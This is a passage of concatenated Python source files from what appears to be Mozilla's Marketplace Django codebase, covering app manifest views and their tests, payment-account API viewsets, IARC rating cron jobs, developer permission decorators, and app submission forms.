pk = Collection.objects.filter(slug=slug).values_list('pk', flat=True)
return FakeCollection(pk[0])
def get_queryset(self):
"""
Fetch (and directly serialize using fireplace serializer) all apps
belonging to the 'all' collection by querying ES.
"""
collection_all = self.get_collection('darjeeling-apps')
membership = DarjeelingCollectionMembershipField(many=True)
membership.context = self.get_serializer_context()
membership.context['use-es-for-apps'] = True
membership.context['featured_pk'] = (
self.get_collection('darjeeling-featured').pk)
return membership.field_to_native_es(collection_all, self.request)
def list(self, request, *args, **kwargs):
data = {}
data['all'] = self.get_queryset()
data['featured'] = [d['id'] for d in data['all'] if d['featured']]
return Response(data)
########NEW FILE########
__FILENAME__ = helpers
from jingo import env, register
import jinja2
from tower import ungettext as ngettext
from amo.helpers import numberfmt
from constants.applications import DEVICE_TYPES
@register.function
def device_list(product):
device_types = product.device_types
if device_types:
t = env.get_template('detail/helpers/device_list.html')
return jinja2.Markup(t.render({
'device_types': device_types,
'all_device_types': DEVICE_TYPES.values()}))
@register.filter
def weekly_downloads(product):
cnt = product.weekly_downloads
return ngettext('{0} weekly download', '{0} weekly downloads',
cnt).format(numberfmt(cnt))
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import hashlib
import json
import zipfile
from django.core.files.storage import default_storage as storage
import mock
from nose.tools import eq_
import amo
import amo.tests
from mkt.webapps.models import Webapp
from mkt.site.fixtures import fixture
class TestPackagedManifest(amo.tests.TestCase):
fixtures = ['base/users'] + fixture('webapp_337141')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
self.app.update(is_packaged=True)
# Create a fake package to go along with the app.
latest_file = self.app.get_latest_file()
with storage.open(latest_file.file_path,
mode='w') as package:
test_package = zipfile.ZipFile(package, 'w')
test_package.writestr('manifest.webapp', 'foobar')
test_package.close()
latest_file.update(hash=latest_file.generate_hash())
self.url = self.app.get_manifest_url()
def tearDown(self):
storage.delete(self.app.get_latest_file().file_path)
def get_digest_from_manifest(self, manifest=None):
if manifest is None:
manifest = self._mocked_json()
elif not isinstance(manifest, (str, unicode)):
manifest = json.dumps(manifest)
hash_ = hashlib.sha256()
hash_.update(manifest)
hash_.update(self.app.get_latest_file().hash)
return hash_.hexdigest()
def _mocked_json(self):
data = {
u'name': u'Packaged App √',
u'version': u'1.0',
u'size': 123456,
u'release_notes': u'Bug fixes',
u'packaged_path': u'/path/to/file.zip',
}
return json.dumps(data)
def login_as_reviewer(self):
self.client.logout()
assert self.client.login(username='[email protected]',
password='password')
def login_as_author(self):
self.client.logout()
user = self.app.authors.all()[0]
self.app.addonuser_set.create(user=user)
assert self.client.login(username=user.email, password='password')
def test_non_packaged(self):
self.app.update(is_packaged=False)
res = self.client.get(self.url)
eq_(res.status_code, 404)
def test_disabled_by_user(self):
self.app.update(disabled_by_user=True)
res = self.client.get(self.url)
eq_(res.status_code, 404)
@mock.patch('mkt.webapps.models.Webapp.get_cached_manifest')
def test_app_public(self, _mock):
_mock.return_value = self._mocked_json()
res = self.client.get(self.url)
eq_(res.content, self._mocked_json())
eq_(res['Content-Type'],
'application/x-web-app-manifest+json; charset=utf-8')
eq_(res['ETag'], '"%s"' % self.get_digest_from_manifest())
@mock.patch('mkt.webapps.models.Webapp.get_cached_manifest')
def test_etag_updates(self, _mock):
_mock.return_value = self._mocked_json()
# Get the minifest with the first simulated package.
res = self.client.get(self.url)
eq_(res.content, self._mocked_json())
eq_(res['Content-Type'],
'application/x-web-app-manifest+json; charset=utf-8')
first_etag = res['ETag']
# Write a new value to the packaged app.
latest_file = self.app.get_latest_file()
with storage.open(latest_file.file_path,
mode='w') as package:
test_package = zipfile.ZipFile(package, 'w')
test_package.writestr('manifest.webapp', 'poop')
test_package.close()
latest_file.update(hash=latest_file.generate_hash())
# Get the minifest with the second simulated package.
res = self.client.get(self.url)
eq_(res.content, self._mocked_json())
eq_(res['Content-Type'],
'application/x-web-app-manifest+json; charset=utf-8')
second_etag = res['ETag']
self.assertNotEqual(first_etag, second_etag)
@mock.patch('mkt.webapps.models.Webapp.get_cached_manifest')
def test_conditional_get(self, _mock):
_mock.return_value = self._mocked_json()
etag = self.get_digest_from_manifest()
res = self.client.get(self.url, HTTP_IF_NONE_MATCH='%s' % etag)
eq_(res.content, '')
eq_(res.status_code, 304)
def test_app_pending(self):
self.app.update(status=amo.STATUS_PENDING)
res = self.client.get(self.url)
eq_(res.status_code, 404)
def test_app_pending_reviewer(self):
self.login_as_reviewer()
self.app.update(status=amo.STATUS_PENDING)
res = self.client.get(self.url)
eq_(res.status_code, 404)
def test_app_pending_author(self):
self.login_as_author()
self.app.update(status=amo.STATUS_PENDING)
res = self.client.get(self.url)
eq_(res.status_code, 404)
@mock.patch('mkt.webapps.models.Webapp.get_cached_manifest')
def test_logged_out(self, _mock):
_mock.return_value = self._mocked_json()
self.client.logout()
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res['Content-type'],
'application/x-web-app-manifest+json; charset=utf-8')
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from django.http import HttpResponse
from mkt.purchase.urls import app_purchase_patterns
from mkt.receipts.urls import app_receipt_patterns
from . import views
DummyResponse = lambda *args, **kw: HttpResponse()
urlpatterns = patterns('',
# Merge app purchase / receipt patterns.
('^purchase/', include(app_purchase_patterns)),
('^purchase/', include(app_receipt_patterns)),
url('^activity/', views.app_activity, name='detail.app_activity'),
)
########NEW FILE########
__FILENAME__ = views
import hashlib
from django import http
from django.shortcuts import get_object_or_404, render
from django.views.decorators.http import etag
import commonware.log
import amo
from addons.decorators import addon_view_factory
from amo.decorators import login_required, permission_required
from amo.utils import paginate
from devhub.models import ActivityLog
from mkt.webapps.models import Webapp
log = commonware.log.getLogger('z.detail')
addon_view = addon_view_factory(qs=Webapp.objects.valid)
addon_all_view = addon_view_factory(qs=Webapp.objects.all)
def manifest(request, uuid):
"""Returns the "mini" manifest for packaged apps.
If not a packaged app, returns a 404.
"""
addon = get_object_or_404(Webapp, guid=uuid, is_packaged=True)
is_avail = addon.status in [amo.STATUS_PUBLIC, amo.STATUS_BLOCKED]
package_etag = hashlib.sha256()
if not addon.is_packaged or addon.disabled_by_user or not is_avail:
raise http.Http404
else:
manifest_content = addon.get_cached_manifest()
package_etag.update(manifest_content)
if addon.is_packaged:
# Update the hash with the content of the package itself.
package_file = addon.get_latest_file()
if package_file:
package_etag.update(package_file.hash)
manifest_etag = package_etag.hexdigest()
@etag(lambda r, a: manifest_etag)
def _inner_view(request, addon):
response = http.HttpResponse(
manifest_content,
content_type='application/x-web-app-manifest+json; charset=utf-8')
return response
return _inner_view(request, addon)
@login_required
@permission_required('AccountLookup', 'View')
@addon_all_view
def app_activity(request, addon):
"""Shows the app activity age for single app."""
user_items = ActivityLog.objects.for_apps([addon]).exclude(
action__in=amo.LOG_HIDE_DEVELOPER)
admin_items = ActivityLog.objects.for_apps([addon]).filter(
action__in=amo.LOG_HIDE_DEVELOPER)
user_items = paginate(request, user_items, per_page=20)
admin_items = paginate(request, admin_items, per_page=20)
return render(request, 'detail/app_activity.html',
{'admin_items': admin_items, 'product': addon,
'user_items': user_items})
########NEW FILE########
__FILENAME__ = api_payments
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
import commonware
from curling.lib import HttpClientError, HttpServerError
from rest_framework import status
from rest_framework.mixins import (CreateModelMixin, DestroyModelMixin,
ListModelMixin, RetrieveModelMixin,
UpdateModelMixin)
from rest_framework.permissions import BasePermission, IsAuthenticated
from rest_framework.relations import HyperlinkedRelatedField
from rest_framework.response import Response
from rest_framework.serializers import (HyperlinkedModelSerializer,
Serializer,
ValidationError)
from rest_framework.viewsets import GenericViewSet
from tower import ugettext as _
import amo
from addons.models import AddonUpsell
from constants.payments import PROVIDER_BANGO
from mkt.api.authorization import (AllowAppOwner, GroupPermission,
switch)
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import MarketplaceView
from mkt.constants.payments import PAYMENT_STATUSES
from mkt.developers.forms_payments import (BangoPaymentAccountForm,
PaymentCheckForm)
from mkt.developers.models import (AddonPaymentAccount, CantCancel,
PaymentAccount)
from mkt.developers.providers import get_provider
from lib.pay_server import get_client
log = commonware.log.getLogger('z.api.payments')
class PaymentAppViewSet(GenericViewSet):
def initialize_request(self, request, *args, **kwargs):
"""
Pass the value in the URL through to the form defined on the
ViewSet, which will populate the app property with the app object.
You must define a form which will take an app object.
"""
request = (super(PaymentAppViewSet, self)
.initialize_request(request, *args, **kwargs))
self.app = None
form = self.form({'app': kwargs.get('pk')})
if form.is_valid():
self.app = form.cleaned_data['app']
return request
class PaymentAccountSerializer(Serializer):
"""
Fake serializer that returns PaymentAccount details when
serializing a PaymentAccount instance. Use only for read operations.
"""
def to_native(self, obj):
data = obj.get_provider().account_retrieve(obj)
data['resource_uri'] = reverse('payment-account-detail',
kwargs={'pk': obj.pk})
return data
class PaymentAccountViewSet(ListModelMixin, RetrieveModelMixin,
MarketplaceView, GenericViewSet):
queryset = PaymentAccount.objects.all()
# PaymentAccountSerializer is not a real serializer, it just looks up
# the details on the object. It's only used for GET requests, in every
# other case we use BangoPaymentAccountForm directly.
serializer_class = PaymentAccountSerializer
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication]
# Security checks are performed in get_queryset(), so we allow any
# authenticated users by default.
permission_classes = [IsAuthenticated]
def get_queryset(self):
"""
Return the queryset specific to the user using the view. (This replaces
permission checks, unauthorized users won't be able to see that an
account they don't have access to exists, we'll return 404 for them.)
"""
qs = super(PaymentAccountViewSet, self).get_queryset()
return qs.filter(user=self.request.amo_user, inactive=False)
def create(self, request, *args, **kwargs):
provider = get_provider()
form = provider.forms['account'](request.DATA)
if form.is_valid():
try:
provider = get_provider()
obj = provider.account_create(request.amo_user, form.data)
except HttpClientError as e:
log.error('Client error creating Bango account; %s' % e)
return Response(e.content,
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except HttpServerError as e:
log.error('Error creating Bango payment account; %s' % e)
return Response(_(u'Could not connect to payment server.'),
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
serializer = self.get_serializer(obj)
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)
def partial_update(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def update(self, request, *args, **kwargs):
self.object = self.get_object()
form = BangoPaymentAccountForm(request.DATA, account=True)
if form.is_valid():
self.object.get_provider().account_update(self.object,
form.cleaned_data)
return Response(status=status.HTTP_204_NO_CONTENT)
return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)
def destroy(self, request, *args, **kwargs):
account = self.get_object()
try:
account.cancel(disable_refs=True)
except CantCancel:
return Response(_('Cannot delete shared account'),
status=status.HTTP_409_CONFLICT)
log.info('Account cancelled: %s' % account.pk)
return Response(status=status.HTTP_204_NO_CONTENT)
class UpsellSerializer(HyperlinkedModelSerializer):
free = premium = HyperlinkedRelatedField(view_name='app-detail')
class Meta:
model = AddonUpsell
fields = ('free', 'premium', 'created', 'modified', 'url')
view_name = 'app-upsell-detail'
def validate(self, attrs):
if attrs['free'].premium_type not in amo.ADDON_FREES:
raise ValidationError('Upsell must be from a free app.')
if attrs['premium'].premium_type in amo.ADDON_FREES:
raise ValidationError('Upsell must be to a premium app.')
return attrs
class UpsellPermission(BasePermission):
"""
Permissions on the upsell object, is determined by permissions on the
free and premium object.
"""
def check(self, request, free, premium):
allow = AllowAppOwner()
for app in free, premium:
if app and not allow.has_object_permission(request, '', app):
return False
return True
def has_object_permission(self, request, view, object):
return self.check(request, object.free, object.premium)
class UpsellViewSet(CreateModelMixin, DestroyModelMixin, RetrieveModelMixin,
UpdateModelMixin, MarketplaceView, GenericViewSet):
permission_classes = (switch('allow-b2g-paid-submission'),
UpsellPermission,)
queryset = AddonUpsell.objects.filter()
serializer_class = UpsellSerializer
def pre_save(self, obj):
if not UpsellPermission().check(self.request, obj.free, obj.premium):
raise PermissionDenied('Not allowed to alter that object')
class AddonPaymentAccountPermission(BasePermission):
"""
Permissions on the app payment account object, is determined by permissions
on the app the account is being used for.
"""
def check(self, request, app, account):
if AllowAppOwner().has_object_permission(request, '', app):
if account.shared or account.user.pk == request.amo_user.pk:
return True
else:
log.info('AddonPaymentAccount access %(account)s denied '
'for %(user)s: wrong user, not shared.'.format(
{'account': account.pk, 'user': request.amo_user.pk}))
else:
log.info('AddonPaymentAccount access %(account)s denied '
'for %(user)s: no app permission.'.format(
{'account': account.pk, 'user': request.amo_user.pk}))
return False
def has_object_permission(self, request, view, object):
return self.check(request, object.addon, object.payment_account)
class AddonPaymentAccountSerializer(HyperlinkedModelSerializer):
addon = HyperlinkedRelatedField(view_name='app-detail')
payment_account = HyperlinkedRelatedField(
view_name='payment-account-detail')
class Meta:
model = AddonPaymentAccount
fields = ('addon', 'payment_account', 'created', 'modified', 'url')
view_name = 'app-payment-account-detail'
def validate(self, attrs):
if attrs['addon'].premium_type in amo.ADDON_FREES:
raise ValidationError('App must be a premium app.')
return attrs
class AddonPaymentAccountViewSet(CreateModelMixin, RetrieveModelMixin,
UpdateModelMixin, MarketplaceView,
GenericViewSet):
permission_classes = (AddonPaymentAccountPermission,)
queryset = AddonPaymentAccount.objects.filter()
serializer_class = AddonPaymentAccountSerializer
def pre_save(self, obj):
if not AddonPaymentAccountPermission().check(self.request,
obj.addon, obj.payment_account):
raise PermissionDenied('Not allowed to alter that object.')
if self.request.method != 'POST':
addon = obj.__class__.objects.no_cache().get(pk=obj.pk).addon
if not obj.addon == addon:
# This should be a 400 error.
raise PermissionDenied('Cannot change the add-on.')
def post_save(self, obj, created=False):
"""Ensure that the setup_bango method is called after creation."""
if created:
provider = get_provider()
uri = provider.product_create(obj.payment_account, obj.addon)
obj.product_uri = uri
obj.save()
class PaymentCheckViewSet(PaymentAppViewSet):
permission_classes = (AllowAppOwner,)
form = PaymentCheckForm
def create(self, request, *args, **kwargs):
"""
We aren't actually creating objects, but proxying them
through to solitude.
"""
if not self.app:
return Response('', status=400)
self.check_object_permissions(request, self.app)
client = get_client()
res = client.api.bango.status.post(
data={'seller_product_bango':
self.app.payment_account(PROVIDER_BANGO).account_uri})
filtered = {
'bango': {
'status': PAYMENT_STATUSES[res['status']],
'errors': ''
},
}
return Response(filtered, status=200)
class PaymentDebugViewSet(PaymentAppViewSet):
permission_classes = [GroupPermission('Transaction', 'Debug')]
form = PaymentCheckForm
def list(self, request, *args, **kwargs):
if not self.app:
return Response('', status=400)
client = get_client()
res = client.api.bango.debug.get(
data={'seller_product_bango':
self.app.payment_account(PROVIDER_BANGO).account_uri})
filtered = {
'bango': res['bango'],
}
return Response(filtered, status=200)
########NEW FILE########
__FILENAME__ = cron
import datetime
import logging
import cronjobs
from celery.task.sets import TaskSet
from tower import ugettext as _
import amo
from amo.utils import chunked
from editors.models import RereviewQueue
import lib.iarc
from lib.iarc.utils import RATINGS_MAPPING
from mkt.developers.tasks import (refresh_iarc_ratings, region_email,
region_exclude)
from mkt.webapps.models import AddonExcludedRegion, Webapp
log = logging.getLogger('z.mkt.developers.cron')
def _region_email(ids, regions):
ts = [region_email.subtask(args=[chunk, regions])
for chunk in chunked(ids, 100)]
TaskSet(ts).apply_async()
@cronjobs.register
def send_new_region_emails(regions):
"""Email app developers notifying them of new regions added."""
excluded = (AddonExcludedRegion.objects
.filter(region__in=[r.id for r in regions])
.values_list('addon', flat=True))
ids = (Webapp.objects.exclude(id__in=excluded)
.filter(enable_new_regions=True)
.values_list('id', flat=True))
_region_email(ids, regions)
def _region_exclude(ids, regions):
ts = [region_exclude.subtask(args=[chunk, regions])
for chunk in chunked(ids, 100)]
TaskSet(ts).apply_async()
@cronjobs.register
def exclude_new_region(regions):
"""
Update regional blacklist based on a list of regions to exclude.
"""
excluded = (AddonExcludedRegion.objects
.filter(region__in=[r.id for r in regions])
.values_list('addon', flat=True))
ids = (Webapp.objects.exclude(id__in=excluded)
.filter(enable_new_regions=False)
.values_list('id', flat=True))
_region_exclude(ids, regions)
@cronjobs.register
def process_iarc_changes(date=None):
"""
Queries IARC for recent changes in the past 24 hours (or date provided).
If date provided use it. It should be in the form YYYY-MM-DD.
NOTE: Get_Rating_Changes only sends the diff of the changes
by rating body. They only send data for the ratings bodies that
changed.
"""
if not date:
date = datetime.date.today()
else:
date = datetime.datetime.strptime(date, '%Y-%m-%d').date()
client = lib.iarc.client.get_iarc_client('services')
xml = lib.iarc.utils.render_xml('get_rating_changes.xml', {
'date_from': date - datetime.timedelta(days=1),
'date_to': date,
})
resp = client.Get_Rating_Changes(XMLString=xml)
data = lib.iarc.utils.IARC_XML_Parser().parse_string(resp)
for row in data.get('rows', []):
iarc_id = row.get('submission_id')
if not iarc_id:
log.debug('IARC changes contained no submission ID: %s' % row)
continue
try:
app = Webapp.objects.get(iarc_info__submission_id=iarc_id)
except Webapp.DoesNotExist:
log.debug('Could not find app associated with IARC submission ID: '
'%s' % iarc_id)
continue
try:
# Fetch and save all IARC info.
refresh_iarc_ratings([app.id])
# Flag for rereview if it changed to adult.
ratings_body = row.get('rating_system')
rating = RATINGS_MAPPING[ratings_body].get(row['new_rating'])
_flag_rereview_adult(app, ratings_body, rating)
# Log change reason.
reason = row.get('change_reason')
amo.log(amo.LOG.CONTENT_RATING_CHANGED, app,
details={'comments': '%s:%s, %s' %
(ratings_body.name, rating.name, reason)})
except Exception as e:
# Any exceptions we catch, log, and keep going.
log.debug('Exception: %s' % e)
continue
def _flag_rereview_adult(app, ratings_body, rating):
"""Flag app for rereview if it receives an Adult content rating."""
old_rating = app.content_ratings.filter(ratings_body=ratings_body.id)
if not old_rating.exists():
return
if rating.adult and not old_rating[0].get_rating().adult:
RereviewQueue.flag(
app, amo.LOG.CONTENT_RATING_TO_ADULT,
message=_('Content rating changed to Adult.'))
########NEW FILE########
__FILENAME__ = decorators
import functools
from django.core.exceptions import ObjectDoesNotExist, PermissionDenied
from amo.decorators import login_required
from access import acl
from addons.decorators import addon_view
def dev_required(owner_for_post=False, allow_editors=False, support=False,
webapp=False, skip_submit_check=False, staff=False):
"""Requires user to be add-on owner or admin.
When allow_editors is True, an editor can view the page.
When `staff` is True, users in the Staff or Support Staff groups are
allowed. Users in the Developers group are allowed read-only.
"""
def decorator(f):
@addon_view
@login_required
@functools.wraps(f)
def wrapper(request, addon, *args, **kw):
from mkt.submit.views import _resume
if webapp:
kw['webapp'] = addon.is_webapp()
fun = lambda: f(request, addon_id=addon.id, addon=addon,
*args, **kw)
if allow_editors and acl.check_reviewer(request):
return fun()
if staff and (acl.action_allowed(request, 'Apps', 'Configure') or
acl.action_allowed(request, 'Apps',
'ViewConfiguration')):
return fun()
if support:
# Let developers and support people do their thangs.
if (acl.check_addon_ownership(request, addon, support=True) or
acl.check_addon_ownership(request, addon, dev=True)):
return fun()
else:
# Require an owner or dev for POST requests.
if request.method == 'POST':
if acl.check_addon_ownership(request, addon,
dev=not owner_for_post):
return fun()
# Ignore disabled so they can view their add-on.
elif acl.check_addon_ownership(request, addon, viewer=True,
ignore_disabled=True):
if not skip_submit_check:
try:
# If it didn't go through the app submission
# checklist. Don't die. This will be useful for
# creating apps with an API later.
step = addon.appsubmissionchecklist.get_next()
except ObjectDoesNotExist:
step = None
# Redirect to the submit flow if they're not done.
if not getattr(f, 'submitting', False) and step:
return _resume(addon, step)
return fun()
raise PermissionDenied
return wrapper
# The arg will be a function if they didn't pass owner_for_post.
if callable(owner_for_post):
f = owner_for_post
owner_for_post = False
return decorator(f)
else:
return decorator
# Mark a view as a web app
def use_apps(f):
def wrapper(request, *args, **kwargs):
return f(request, *args, webapp=True, **kwargs)
return wrapper
########NEW FILE########
__FILENAME__ = forms
# -*- coding: utf-8 -*-
import json
import os
from datetime import datetime
from zipfile import ZipFile
from django import forms
from django.conf import settings
from django.core.validators import URLValidator
from django.forms.extras.widgets import SelectDateWidget
from django.forms.models import modelformset_factory
from django.template.defaultfilters import filesizeformat
import commonware
import happyforms
import waffle
from product_details import product_details
from quieter_formset.formset import BaseModelFormSet
from tower import ugettext as _, ugettext_lazy as _lazy, ungettext as ngettext
import addons.forms
import amo
import lib.iarc
from access import acl
from addons.forms import clean_tags, icons, slug_validator
from addons.models import Addon, AddonUser, BlacklistedSlug, Category, Preview
from addons.widgets import CategoriesSelectMultiple, IconWidgetRenderer
from amo import get_user
from amo.fields import SeparatedValuesField
from amo.utils import remove_icons, slugify
from files.models import FileUpload
from files.utils import WebAppParser
from lib.video import tasks as vtasks
from tags.models import Tag
from translations.fields import TransField
from translations.models import Translation
from translations.widgets import TranslationTextarea, TransTextarea
from versions.models import Version
import mkt
from mkt.api.models import Access
from mkt.constants import MAX_PACKAGED_APP_SIZE
from mkt.regions import REGIONS_CHOICES_SORTED_BY_NAME
from mkt.regions.utils import parse_region
from mkt.site.forms import AddonChoiceField
from mkt.webapps.models import IARCInfo, Webapp
from mkt.webapps.tasks import index_webapps
from . import tasks
log = commonware.log.getLogger('mkt.developers')
region_error = lambda region: forms.ValidationError(
_('You cannot select {region}.').format(
region=unicode(parse_region(region).name)
)
)
def toggle_app_for_special_regions(request, app, enabled_regions=None):
"""Toggle for special regions (e.g., China)."""
if not waffle.flag_is_active(request, 'special-regions'):
return
for region in mkt.regions.SPECIAL_REGIONS:
status = app.geodata.get_status(region)
if enabled_regions is not None:
if region.id in enabled_regions:
# If it's not already enabled, mark as pending.
if status != amo.STATUS_PUBLIC:
# Developer requested for it to be in China.
status = amo.STATUS_PENDING
value, changed = app.geodata.set_status(region, status)
if changed:
log.info(u'[Webapp:%s] App marked as pending '
u'special region (%s).' % (app, region.slug))
value, changed = app.geodata.set_nominated_date(
region, save=True)
log.info(u'[Webapp:%s] Setting nomination date for to '
u'now for region (%s).' % (app, region.slug))
else:
# Developer cancelled request for approval.
status = amo.STATUS_NULL
value, changed = app.geodata.set_status(
region, status, save=True)
if changed:
log.info(u'[Webapp:%s] App marked as null special '
u'region (%s).' % (app, region.slug))
if status == amo.STATUS_PUBLIC:
# Reviewer approved for it to be in China.
aer = app.addonexcludedregion.filter(region=region.id)
if aer.exists():
aer.delete()
log.info(u'[Webapp:%s] App included in new special '
u'region (%s).' % (app, region.slug))
else:
# Developer requested for it to be in China.
aer, created = app.addonexcludedregion.get_or_create(
region=region.id)
if created:
log.info(u'[Webapp:%s] App excluded from new special '
u'region (%s).' % (app, region.slug))
class AuthorForm(happyforms.ModelForm):
# TODO: Remove this whole __init__ when the 'allow-refund' flag goes away.
def __init__(self, *args, **kwargs):
super(AuthorForm, self).__init__(*args, **kwargs)
self.fields['role'].choices = (
(c, s) for c, s in amo.AUTHOR_CHOICES
if c != amo.AUTHOR_ROLE_SUPPORT or
waffle.switch_is_active('allow-refund'))
def clean_user(self):
user = self.cleaned_data['user']
if not user.read_dev_agreement:
raise forms.ValidationError(
_('All team members must have read and agreed to the '
'developer agreement.'))
return user
class Meta:
model = AddonUser
exclude = ('addon',)
class BaseModelFormSet(BaseModelFormSet):
"""
Override the parent's is_valid to prevent deleting all forms.
"""
def is_valid(self):
# clean() won't get called in is_valid() if all the rows are getting
# deleted. We can't allow deleting everything.
rv = super(BaseModelFormSet, self).is_valid()
return rv and not any(self.errors) and not bool(self.non_form_errors())
class BaseAuthorFormSet(BaseModelFormSet):
def clean(self):
if any(self.errors):
return
# cleaned_data could be None if it's the empty extra form.
data = filter(None, [f.cleaned_data for f in self.forms
if not f.cleaned_data.get('DELETE', False)])
if not any(d['role'] == amo.AUTHOR_ROLE_OWNER for d in data):
raise forms.ValidationError(_('Must have at least one owner.'))
if not any(d['listed'] for d in data):
raise forms.ValidationError(
_('At least one team member must be listed.'))
users = [d['user'] for d in data]
if sorted(users) != sorted(set(users)):
raise forms.ValidationError(
_('A team member can only be listed once.'))
AuthorFormSet = modelformset_factory(AddonUser, formset=BaseAuthorFormSet,
form=AuthorForm, can_delete=True, extra=0)
class DeleteForm(happyforms.Form):
reason = forms.CharField(required=False)
def __init__(self, request):
super(DeleteForm, self).__init__(request.POST)
def trap_duplicate(request, manifest_url):
# See if this user has any other apps with the same manifest.
owned = (request.user.addonuser_set
.filter(addon__manifest_url=manifest_url))
if not owned:
return
try:
app = owned[0].addon
except Addon.DoesNotExist:
return
error_url = app.get_dev_url()
msg = None
if app.status == amo.STATUS_PUBLIC:
msg = _(u'Oops, looks like you already submitted that manifest '
'for %s, which is currently public. '
'<a href="%s">Edit app</a>')
elif app.status == amo.STATUS_PENDING:
msg = _(u'Oops, looks like you already submitted that manifest '
'for %s, which is currently pending. '
'<a href="%s">Edit app</a>')
elif app.status == amo.STATUS_NULL:
msg = _(u'Oops, looks like you already submitted that manifest '
'for %s, which is currently incomplete. '
'<a href="%s">Resume app</a>')
elif app.status == amo.STATUS_REJECTED:
msg = _(u'Oops, looks like you already submitted that manifest '
'for %s, which is currently rejected. '
'<a href="%s">Edit app</a>')
elif app.status == amo.STATUS_DISABLED:
msg = _(u'Oops, looks like you already submitted that manifest '
'for %s, which is currently disabled by Mozilla. '
'<a href="%s">Edit app</a>')
elif app.disabled_by_user:
msg = _(u'Oops, looks like you already submitted that manifest '
'for %s, which is currently disabled. '
'<a href="%s">Edit app</a>')
if msg:
return msg % (app.name, error_url)
def verify_app_domain(manifest_url, exclude=None, packaged=False):
if packaged or waffle.switch_is_active('webapps-unique-by-domain'):
domain = Webapp.domain_from_url(manifest_url)
qs = Webapp.objects.filter(app_domain=domain)
if exclude:
qs = qs.exclude(pk=exclude.pk)
if qs.exists():
raise forms.ValidationError(
_('An app already exists on this domain; '
'only one app per domain is allowed.'))
class PreviewForm(happyforms.ModelForm):
file_upload = forms.FileField(required=False)
upload_hash = forms.CharField(required=False)
# This lets us POST the data URIs of the unsaved previews so we can still
# show them if there were form errors.
unsaved_image_data = forms.CharField(required=False,
widget=forms.HiddenInput)
unsaved_image_type = forms.CharField(required=False,
widget=forms.HiddenInput)
def save(self, addon, commit=True):
if self.cleaned_data:
self.instance.addon = addon
if self.cleaned_data.get('DELETE'):
# Existing preview.
if self.instance.id:
self.instance.delete()
# User has no desire to save this preview.
return
super(PreviewForm, self).save(commit=commit)
if self.cleaned_data['upload_hash']:
upload_hash = self.cleaned_data['upload_hash']
upload_path = os.path.join(settings.TMP_PATH, 'preview',
upload_hash)
filetype = (os.path.splitext(upload_hash)[1][1:]
.replace('-', '/'))
if filetype in amo.VIDEO_TYPES:
self.instance.update(filetype=filetype)
vtasks.resize_video.delay(upload_path, self.instance,
user=amo.get_user(),
set_modified_on=[self.instance])
else:
self.instance.update(filetype='image/png')
tasks.resize_preview.delay(upload_path, self.instance,
set_modified_on=[self.instance])
class Meta:
model = Preview
fields = ('file_upload', 'upload_hash', 'id', 'position')
class JSONField(forms.Field):
def to_python(self, value):
if value == '':
return None
try:
if isinstance(value, basestring):
return json.loads(value)
except ValueError:
pass
return value
class JSONMultipleChoiceField(forms.MultipleChoiceField, JSONField):
widget = forms.CheckboxSelectMultiple
class AdminSettingsForm(PreviewForm):
DELETE = forms.BooleanField(required=False)
mozilla_contact = SeparatedValuesField(forms.EmailField, separator=',',
required=False)
vip_app = forms.BooleanField(required=False)
priority_review = forms.BooleanField(required=False)
tags = forms.CharField(required=False)
banner_regions = JSONMultipleChoiceField(
required=False, choices=mkt.regions.REGIONS_CHOICES_NAME)
banner_message = TransField(required=False)
class Meta:
model = Preview
fields = ('file_upload', 'upload_hash', 'position')
def __init__(self, *args, **kw):
# Get the object for the app's promo `Preview` and pass it to the form.
if kw.get('instance'):
addon = kw.pop('instance')
self.instance = addon
self.promo = addon.get_promo()
self.request = kw.pop('request', None)
# Note: After calling `super`, `self.instance` becomes the `Preview`
# object.
super(AdminSettingsForm, self).__init__(*args, **kw)
self.initial['vip_app'] = addon.vip_app
self.initial['priority_review'] = addon.priority_review
if self.instance:
self.initial['mozilla_contact'] = addon.mozilla_contact
self.initial['tags'] = ', '.join(self.get_tags(addon))
self.initial['banner_regions'] = addon.geodata.banner_regions or []
self.initial['banner_message'] = addon.geodata.banner_message_id
@property
def regions_by_id(self):
return mkt.regions.REGIONS_CHOICES_ID_DICT
def clean_position(self):
return -1
def clean_banner_regions(self):
try:
regions = map(int, self.cleaned_data.get('banner_regions'))
except (TypeError, ValueError):
# input data is not a list or data contains non-integers.
raise forms.ValidationError(_('Invalid region(s) selected.'))
return list(regions)
def get_tags(self, addon):
if acl.action_allowed(self.request, 'Apps', 'Edit'):
return list(addon.tags.values_list('tag_text', flat=True))
else:
return list(addon.tags.filter(restricted=False)
.values_list('tag_text', flat=True))
def clean_tags(self):
return clean_tags(self.request, self.cleaned_data['tags'])
def clean_mozilla_contact(self):
contact = self.cleaned_data.get('mozilla_contact')
if self.cleaned_data.get('mozilla_contact') is None:
return u''
return contact
def save(self, addon, commit=True):
if (self.cleaned_data.get('DELETE') and
'upload_hash' not in self.changed_data and self.promo.id):
self.promo.delete()
elif self.promo and 'upload_hash' in self.changed_data:
self.promo.delete()
elif self.cleaned_data.get('upload_hash'):
super(AdminSettingsForm, self).save(addon, True)
contact = self.cleaned_data.get('mozilla_contact')
updates = {} if contact is None else {'mozilla_contact': contact}
updates.update({'vip_app': self.cleaned_data.get('vip_app')})
updates.update({'priority_review': self.cleaned_data.get('priority_review')})
addon.update(**updates)
tags_new = self.cleaned_data['tags']
tags_old = [slugify(t, spaces=True) for t in self.get_tags(addon)]
add_tags = set(tags_new) - set(tags_old)
del_tags = set(tags_old) - set(tags_new)
# Add new tags.
for t in add_tags:
Tag(tag_text=t).save_tag(addon)
# Remove old tags.
for t in del_tags:
Tag(tag_text=t).remove_tag(addon)
geodata = addon.geodata
geodata.banner_regions = self.cleaned_data.get('banner_regions')
